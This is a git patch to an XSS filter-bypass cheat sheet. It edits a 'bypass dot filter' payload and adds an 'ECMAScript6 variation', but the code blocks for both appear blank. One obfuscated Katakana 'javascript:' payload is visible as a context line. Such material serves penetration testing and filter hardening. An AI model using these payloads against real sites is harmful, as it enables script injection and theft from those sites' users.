From 4187f87d0df270fba23649fa581a4fa8d4683175 Mon Sep 17 00:00:00 2001 From: Infected Drake Date: Wed, 20 Feb 2019 11:17:49 +0530 Subject: [PATCH] Added a new bypass variant + fixed a payload --- XSS injection/README.md | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/XSS injection/README.md b/XSS injection/README.md index 6169b46d..db5f4013 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -465,7 +465,7 @@ You can bypass a single quote with ' in an on mousedown event handler Bypass dot filter ```javascript - ``` Bypass parenthesis for string - Firefox/Opera @@ -654,6 +654,12 @@ Bypass using [Katakana](https://github.com/aemkei/katakana.js) javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')() ``` +Bypass using ECMAScript6 variation: + +``` + +``` + Bypass using Octal encoding ```javascript